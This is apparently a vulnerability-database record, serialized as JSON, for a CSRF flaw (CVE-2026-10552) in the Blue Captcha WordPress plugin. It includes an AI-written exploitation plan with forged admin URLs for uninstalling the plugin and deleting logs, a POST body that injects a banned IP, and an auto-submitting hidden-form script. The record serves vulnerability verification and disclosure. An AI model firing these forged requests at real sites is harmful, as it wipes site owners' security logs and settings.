[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$ffKal2AeaEjUMrCXk57MvsEq4N0lqPqHCCMaooJih0Vs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":24,"research_started_at":25,"research_completed_at":26,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":27},"CVE-2026-10552","blue-captcha-cross-site-request-forgery-via-blcapaction-parameter","Blue Captcha \u003C= 2.0.1 - Cross-Site Request Forgery via 'blcap_action' Parameter","The Blue Captcha plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to and including 2.0.1. This is due to missing or incorrect nonce validation on the main admin panel (blcap_main_page) and on the Hall of Shame and Log subpages, which accept a 'blcap_action' \u002F 'action' parameter from $_REQUEST and perform destructive operations (plugin uninstall via blcap_uninstall(), log deletion via blcap_delete_logs(), Hall of Shame deletion via blcap_delete_ip_db(), and adding IPs to the banned list via update_option('blcap_settings')) with no wp_verify_nonce(), check_admin_referer(), or check_ajax_referer() calls anywhere in the codebase. This makes it possible for unauthenticated attackers to uninstall the plugin, delete audit logs, remove Hall of Shame entries, and add arbitrary IP addresses to the block list via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","blue-captcha",null,"\u003C=2.0.1","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-06-23 16:41:19","2026-06-24 05:33:26",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F793072e9-250b-4a2c-819f-aa7e1dc7d4d6?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-10552 (Blue Captcha CSRF)\n\nThis plan outlines the technical steps required to verify the Cross-Site Request Forgery (CSRF) vulnerability in the Blue Captcha plugin (\u003C= 2.0.1).\n\n## 1. Vulnerability Summary\nThe Blue Captcha plugin fails to implement nonce verification on its administrative interfaces. Destructive operations—including plugin uninstallation, log deletion, and IP blacklisting—are triggered via the `blcap_action` or `action` parameters within the `$_REQUEST` superglobal. Because the plugin does not check for a valid WordPress nonce or verify the request origin (via `check_admin_referer`), an attacker can trick an authenticated administrator into performing these actions by enticing them to visit a malicious URL or submit a hidden form.\n\n## 2. Attack Vector Analysis\n*   **Vulnerable Endpoint:** `\u002Fwp-admin\u002Fadmin.php` (specifically when the `page` parameter is set to the plugin's menu slug, likely `blue-captcha`).\n*   **Action Parameter:** `blcap_action` or `action` (retrieved via `$_REQUEST`).\n*   **Authentication Level:** Requires an active session of a user with `manage_options` capabilities (typically an Administrator).\n*   **Preconditions:** The victim must be logged into the WordPress dashboard and interact with the attacker's forged request (e.g., clicking a link or loading a page with an auto-submitting form).\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers an admin menu page via `add_menu_page()` or `add_submenu_page()` in a function hooked to `admin_menu`.\n2.  **Controller Logic:** The callback function for the main admin page (referenced as `blcap_main_page` in the description) likely contains a conditional block:\n    ```php\n    \u002F\u002F Inferred logic based on vulnerability description\n    if ( isset( $_REQUEST['blcap_action'] ) ) {\n        $action = $_REQUEST['blcap_action'];\n        if ( $action == 'uninstall' ) {\n            blcap_uninstall();\n        } elseif ( $action == 'delete_logs' ) {\n            blcap_delete_logs();\n        }\n        \u002F\u002F ... and so on\n    }\n    ```\n3.  **Sink:** Functions like `blcap_uninstall()`, `blcap_delete_logs()`, and `blcap_delete_ip_db()` are called directly without any `wp_verify_nonce()` or `current_user_can()` checks inside the action-handling logic.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, there are **no nonce checks** implemented for these actions.\n*   **Nonce Status:** Not Required.\n*   **Bypass:** The vulnerability exists because the security control is entirely absent. No acquisition from the DOM or JS variables is necessary to execute the state-changing request.\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate that an unauthenticated attacker can force an administrator to trigger the `blcap_uninstall()` function via CSRF.\n\n### Step 1: Trigger Plugin Uninstall\nThe attacker crafts a URL that, when loaded by the admin, triggers the uninstallation.\n\n*   **Tool:** `http_request`\n*   **Method:** `GET` (Since `$_REQUEST` is used, GET is typically sufficient and easier to exploit via simple links or tags).\n*   **URL:** `http:\u002F\u002F[target-site]\u002Fwp-admin\u002Fadmin.php?page=blue-captcha&blcap_action=uninstall`\n*   **Headers:**\n    *   `Cookie`: [Admin Session Cookies] (Simulated in the agent's browser environment).\n\n### Step 2: Clear Hall of Shame (Alternative Action)\n*   **Method:** `GET`\n*   **URL:** `http:\u002F\u002F[target-site]\u002Fwp-admin\u002Fadmin.php?page=blue-captcha&blcap_action=delete_ip_db`\n\n### Step 3: Add Arbitrary IP to Blocklist\nThe description mentions `update_option('blcap_settings')` is vulnerable. This likely requires a POST request to mimic a settings save.\n\n*   **Method:** `POST`\n*   **URL:** `http:\u002F\u002F[target-site]\u002Fwp-admin\u002Fadmin.php?page=blue-captcha`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body:** `blcap_action=update_settings&blcap_settings[banned_ips]=13.37.13.37` (Structure inferred; `blcap_settings` is the option name mentioned).\n\n## 6. Test Data Setup\nBefore exploitation, ensure the environment is populated:\n1.  **Activate Plugin:** `wp plugin activate blue-captcha`\n2.  **Generate Logs:** Perform several failed login attempts to populate the \"Log\" subpage.\n3.  **Populate Hall of Shame:** Manually add an IP or use `wp option update blcap_settings ...` to ensure the database has data to delete.\n4.  **Identify Slug:** Verify the admin page slug using `wp admin-menu list | grep Blue`.\n\n## 7. Expected Results\n*   **Uninstall Action:** The plugin should be deactivated and its data (options) removed from the `wp_options` table. The user might be redirected to the main plugins page.\n*   **Log Deletion:** Navigating to the Blue Captcha log page should show \"No logs found\" or an empty table.\n*   **IP Blocklist:** The `blcap_settings` option in the database should reflect the attacker-supplied IP address.\n\n## 8. Verification Steps\nAfter sending the HTTP requests, verify the impact via WP-CLI:\n\n1.  **Check Plugin Status:**\n    `wp plugin is-active blue-captcha`\n    *(Expected: Failure\u002FNot active if uninstall was triggered)*\n2.  **Check Banned IPs:**\n    `wp option get blcap_settings`\n    *(Expected: Presence of the injected IP address)*\n3.  **Check Logs Table (if custom table used):**\n    `wp db query \"SELECT COUNT(*) FROM wp_blcap_logs\"` (Table name inferred)\n    *(Expected: 0)*\n\n## 9. Alternative Approaches\n*   **Action Parameter Variations:** If `blcap_action` fails, attempt using the standard WordPress `action` parameter: `admin.php?page=blue-captcha&action=uninstall`.\n*   **Request Method Enforcement:** If the server or plugin enforces POST, use `browser_eval` to create and submit a hidden form programmatically:\n    ```javascript\n    const form = document.createElement('form');\n    form.method = 'POST';\n    form.action = '\u002Fwp-admin\u002Fadmin.php?page=blue-captcha';\n    const input = document.createElement('input');\n    input.name = 'blcap_action';\n    input.value = 'uninstall';\n    form.appendChild(input);\n    document.body.appendChild(form);\n    form.submit();\n    ```\n*   **Subpage Targeting:** If the main page doesn't handle the action, target the subpages mentioned: `admin.php?page=blcap_logs&blcap_action=delete_logs`.","gemini-3-flash-preview","2026-06-25 19:16:48","2026-06-25 19:17:28",{"type":28,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":29},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fblue-captcha\u002Ftags"]